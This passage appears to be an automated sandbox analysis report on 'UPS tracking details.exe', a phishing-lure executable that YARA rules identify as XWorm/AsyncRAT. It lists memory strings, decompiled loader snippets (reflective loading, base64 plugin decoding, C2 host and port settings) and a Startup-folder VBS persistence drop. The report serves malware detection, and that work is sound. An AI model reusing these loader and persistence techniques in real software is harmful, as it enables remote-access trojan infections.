earchset_SimilaritySearchget_Ocrset_OcrDisallowPublicIdBackupUseFilenameUniqueFilenameDiscardOriginalFilenameProxyOverwriteRawConvertAllowedFormatsCategorizationAutoTaggingSimilaritySearchOcr vs UPS tracking details.exe
                    Source: UPS tracking details.exe, 00000001.00000002.1695473543.00000000036B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs UPS tracking details.exe
                    Source: UPS tracking details.exe, 00000001.00000002.1695473543.0000000003764000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs UPS tracking details.exe
                    Source: UPS tracking details.exe, 00000001.00000000.1537011166.00000000001B8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedoggy tk.exe2 vs UPS tracking details.exe
                    Source: UPS tracking details.exe, 00000001.00000002.1697608532.0000000005520000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameEnxfelbpex.dll" vs UPS tracking details.exe
                    Source: UPS tracking details.exe, 00000001.00000002.1682564416.0000000002A94000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDOGGY XWORM.exe4 vs UPS tracking details.exe
                    Source: UPS tracking details.exe, 00000003.00000002.2789720458.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDOGGY XWORM.exe4 vs UPS tracking details.exe
                    Source: UPS tracking details.exe, 00000003.00000002.2790126652.0000000000D78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs UPS tracking details.exe
                    Source: UPS tracking details.exeBinary or memory string: IsUseOriginalFilename vs UPS tracking details.exe
                    Source: UPS tracking details.exeBinary or memory string: UseOriginalFilename vs UPS tracking details.exe
                    Source: UPS tracking details.exeBinary or memory string: useOriginalFilename vs UPS tracking details.exe
                    Source: UPS tracking details.exeBinary or memory string: PublicIdsTagsPrefixesprefixesCheckModemodeTransformationstransformationsTargetFormattargetFormatTargetPublicIdtargetPublicIdIsFlattenFoldersFlattenFoldersflattenFoldersIsFlattenTransformationsFlattenTransformationsflattenTransformationsExpiresAtexpiresAtIsUseOriginalFilenameUseOriginalFilenameuseOriginalFilenameIsAsyncAsyncasyncNotificationUrlnotificationUrlTargetTagstargetTagsIsKeepDerivedKeepDerivedkeepDerivedIsSkipTransformationNameSkipTransformationNameskipTransformationNameToParamsDictionaryset_Urlget_SecureUrlset_SecureUrlget_PublicIdset_PublicIdget_Bytesset_Bytesget_FileCountset_FileCountSecureUrlBytesFileCountAddCustomParamAddParamMinValueAddCoordinatescoordObj<>9__10_0PendingRejectedApprovedOverriddenImageRawset_Versionset_Uriget_SecureUriset_SecureUriset_LengthSecureUriLengthset_StatusCodeget_JsonObjset_JsonObjget_Errorset_Errorget_Limitset_Limitget_Remainingset_Remainingget_Resetset_ResetStatusCodeJsonObjLimitRemainingResetget_Messageset_MessageMessageStatusKindResponseUpdatedAtget_PublicIdsset_PublicIdsget_Contextset_Contextget_Typeset_Typeget_Commandset_CommandCommandRemoveAllget_Nameset_Nameget_Transformset_TransformName vs UPS tracking details.exe
                    Source: UPS tracking details.exeBinary or memory string: get_DiscardOriginalFilename vs UPS tracking details.exe
                    Source: UPS tracking details.exeBinary or memory string: set_DiscardOriginalFilename vs UPS tracking details.exe
                    Source: UPS tracking details.exeBinary or memory string: DiscardOriginalFilename vs UPS tracking details.exe
                    Source: UPS tracking details.exeBinary or memory string: set_Transformationget_NotificationUrlset_NotificationUrlget_Statusset_Statusget_BatchIdset_BatchIdBatchIdget_Foldersset_FoldersFoldersget_Exifset_Exifget_Colorsset_Colorsget_Facesset_Facesget_Metadataset_Metadataget_Coordinatesset_Coordinatesget_MaxResultsset_MaxResultsget_Phashset_PhashExifColorsFacesMetadataPhashget_Createdset_Createdget_Derivedset_Derivedget_Moderationset_Moderationget_Predominantset_Predominantget_Infoset_InfoCreatedget_Customset_CustomCustomget_Googleset_GoogleGoogleget_Idset_IdIdget_Detectionset_Detectionget_RekognitionFaceset_RekognitionFaceget_BoundingBoxset_BoundingBoxget_Confidenceset_Confidenceget_Ageset_Ageget_Smileset_Smileget_Glassesset_Glassesget_Sunglassesset_Sunglassesget_Beardset_Beardget_Mustacheset_Mustacheget_EyeClosedset_EyeClosedget_MouthOpenWideset_MouthOpenWideget_Beautyset_Beautyget_Genderset_Genderget_Raceset_Raceget_Emotionset_Emotionget_Qualityset_Qualityget_Poseset_Poseget_EyeLeftPositionset_EyeLeftPositionget_EyeRightPositionset_EyeRightPositionget_EyeLeft_Leftset_EyeLeft_Leftget_EyeLeft_Rightset_EyeLeft_Rightget_EyeLeft_Upset_EyeLeft_Upget_EyeLeft_Downset_EyeLeft_Downget_EyeRight_Leftset_EyeRight_Leftget_EyeRight_Rightset_EyeRight_Rightget_EyeRight_Upset_EyeRight_Upget_EyeRight_Downset_EyeRight_Downget_NosePositionset_NosePositionget_NoseLeftset_NoseLeftget_NoseRightset_NoseRightget_MouthLeftset_MouthLeftget_MouthRightset_MouthRightget_MouthUpset_MouthUpget_MouthDownset_MouthDownConfidenceAgeSmileGlassesSunglassesBeardMustacheEyeClosedMouthOpenWideBeautyGenderRaceEmotionPoseEyeLeftPositionEyeRightPositionEyeLeft_LeftEyeLeft_RightEyeLeft_UpEyeLeft_DownEyeRight_LeftEyeRight_RightEyeRight_UpEyeRight_DownNosePositionNoseLeftNoseRightMouthLeftMouthRightMouthUpMouthDownget_TopLeftset_TopLeftget_Sizeset_SizeTopLeftget_Strictset_Strictget_Usedset_UsedStrictUsedget_Unsignedset_Unsignedget_Settingsset_SettingsUnsignedget_DisallowPublicIdset_DisallowPublicIdget_Backupset_Backupget_UseFilenameset_UseFilenameget_UniqueFilenameset_UniqueFilenameget_DiscardOriginalFilenameset_DiscardOriginalFilenameget_Proxyset_Proxyget_Folderset_Folderget_Overwriteset_Overwriteget_RawConvertset_RawConvertget_AllowedFormatsset_AllowedFormatsget_Categorizationset_Categorizationget_AutoTaggingset_AutoTaggingget_SimilaritySearchset_SimilaritySearchget_Ocrset_OcrDisallowPublicIdBackupUseFilenameUniqueFilenameDiscardOriginalFilenameProxyOverwriteRawConvertAllowedFormatsCategorizationAutoTaggingSimilaritySearchOcr vs UPS tracking details.exe
                    Source: UPS tracking details.exeBinary or memory string: OriginalFilenamedoggy tk.exe2 vs UPS tracking details.exe
                    Source: UPS tracking details.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 1.2.UPS tracking details.exe.27756d4.1.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                    Source: 1.2.UPS tracking details.exe.27756d4.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 3.2.UPS tracking details.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                    Source: 3.2.UPS tracking details.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 1.2.UPS tracking details.exe.27756d4.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                    Source: 1.2.UPS tracking details.exe.27756d4.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000003.00000002.2789720458.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000001.00000002.1682564416.00000000029ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000001.00000002.1682564416.000000000266D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: UPS tracking details.exe, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                    Source: UPS tracking details.exe, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                    Source: UPS tracking details.exe, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                    Source: 1.2.UPS tracking details.exe.27756d4.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.UPS tracking details.exe.27756d4.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.UPS tracking details.exe.27756d4.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.UPS tracking details.exe.37b4e00.2.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 1.2.UPS tracking details.exe.37b4e00.2.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 1.2.UPS tracking details.exe.37b4e00.2.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 1.2.UPS tracking details.exe.37b4e00.2.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 1.2.UPS tracking details.exe.37b4e00.2.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 1.2.UPS tracking details.exe.37b4e00.2.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 1.2.UPS tracking details.exe.37b4e00.2.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 1.2.UPS tracking details.exe.37b4e00.2.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 1.2.UPS tracking details.exe.37b4e00.2.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 1.2.UPS tracking details.exe.27756d4.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 1.2.UPS tracking details.exe.27756d4.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 1.2.UPS tracking details.exe.37b4e00.2.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@4/3@1/1
                    Source: C:\Users\user\Desktop\UPS tracking details.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Remaining.vbsJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\UPS tracking details.exeMutant created: \Sessions\1\BaseNamedObjects\56TvElZMbqDoRvU7
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1104:64:WilError_03
                    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\a731107b-9c7a-46b2-86aa-3978d58a6040Jump to behavior
                    Source: UPS tracking details.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: UPS tracking details.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\UPS tracking details.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: UPS tracking details.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\Desktop\UPS tracking details.exeFile read: C:\Users\user\Desktop\UPS tracking details.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\UPS tracking details.exe "C:\Users\user\Desktop\UPS tracking details.exe"
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess created: C:\Users\user\Desktop\UPS tracking details.exe "C:\Users\user\Desktop\UPS tracking details.exe"
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6572 -s 928
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess created: C:\Users\user\Desktop\UPS tracking details.exe "C:\Users\user\Desktop\UPS tracking details.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: mscorjit.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: UPS tracking details.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: UPS tracking details.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: UPS tracking details.exe, 00000003.00000002.2790126652.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \System.pdb source: UPS tracking details.exe, 00000003.00000002.2790126652.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\System.pdbwz source: UPS tracking details.exe, 00000003.00000002.2790126652.0000000000DED000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb0 source: UPS tracking details.exe, 00000003.00000002.2790126652.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: UPS tracking details.exe, 00000001.00000002.1699691438.0000000005B30000.00000004.08000000.00040000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1695473543.0000000003764000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\user\Desktop\UPS tracking details.PDBD{ww`P source: UPS tracking details.exe, 00000003.00000002.2789943672.0000000000CF7000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: UPS tracking details.exe, 00000001.00000002.1699691438.0000000005B30000.00000004.08000000.00040000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1695473543.0000000003764000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: UPS tracking details.exe, 00000001.00000002.1695473543.0000000003662000.00000004.00000800.00020000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1699502154.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1695473543.00000000036B2000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: UPS tracking details.exe, 00000001.00000002.1695473543.0000000003662000.00000004.00000800.00020000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1699502154.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1695473543.00000000036B2000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\System.pdb source: UPS tracking details.exe, 00000003.00000002.2790126652.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: HPzo,C:\Windows\System.pdb source: UPS tracking details.exe, 00000003.00000002.2789943672.0000000000CF7000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: UPS tracking details.exe, 00000003.00000002.2790126652.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: ##.pdb source: UPS tracking details.exe, 00000003.00000002.2789943672.0000000000CF7000.00000004.00000010.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: UPS tracking details.exe, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 1.2.UPS tracking details.exe.27756d4.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: 1.2.UPS tracking details.exe.27756d4.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: 1.2.UPS tracking details.exe.27756d4.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: 1.2.UPS tracking details.exe.27756d4.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                    Source: 1.2.UPS tracking details.exe.27756d4.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                    Source: 1.2.UPS tracking details.exe.27756d4.1.raw.unpack, Messages.cs.Net Code: Memory
                    Source: 1.2.UPS tracking details.exe.37b4e00.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 1.2.UPS tracking details.exe.37b4e00.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 1.2.UPS tracking details.exe.37b4e00.2.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 1.2.UPS tracking details.exe.36b2840.8.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 1.2.UPS tracking details.exe.36b2840.8.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 1.2.UPS tracking details.exe.36b2840.8.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 1.2.UPS tracking details.exe.36b2840.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 1.2.UPS tracking details.exe.36b2840.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: Yara matchFile source: 1.2.UPS tracking details.exe.3585570.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.UPS tracking details.exe.59f0000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.UPS tracking details.exe.59f0000.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.UPS tracking details.exe.3585570.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.1699346885.00000000059F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1682564416.000000000266D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1695473543.0000000003581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: UPS tracking details.exe PID: 3164, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\UPS tracking details.exeCode function: 1_2_007D4BA4 push esi; ret 1_2_007D4BA7
                    Source: UPS tracking details.exeStatic PE information: section name: .text entropy: 7.249942036887339
                    Source: Remaining.exe.1.drStatic PE information: section name: .text entropy: 7.249942036887339
                    Source: UPS tracking details.exe, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'tntKxOViOWtVx', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                    Source: 1.2.UPS tracking details.exe.5520000.10.raw.unpack, Aqte0mLHflkRyrFZEqr.csHigh entropy of concatenated method names: 'qWqLZAGIxx', 'kUJLI3N3Mf', 'ovxLuy85Jg', 'zqpL7C35ph', 'lNCL1kCJHI', 'IREL2JfORn', 'l9xLWhlhAY', 'XA1LpMqwYD', 'gqQLxZwAva', 'qS3LYbNH5F'
                    Source: 1.2.UPS tracking details.exe.5520000.10.raw.unpack, CwsrpNyyjLJM1AasIS4.csHigh entropy of concatenated method names: 'UojyqSENYW', 'ULMyUt1pim', 'N4PyHxh4Er', 'rUsyR9CHLu', 'yfFyZqhKmq', 'G0lyKLDqnc', 'OT6svWdkvCkgDagVrsI', 'Bun5YcdsPUFr7wjZ3T8'
                    Source: C:\Users\user\Desktop\UPS tracking details.exeFile created: C:\Users\user\AppData\Roaming\Remaining.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\UPS tracking details.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Remaining.vbsJump to dropped file
                    Source: C:\Users\user\Desktop\UPS tracking details.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Remaining.vbsJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Remaining.vbsJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
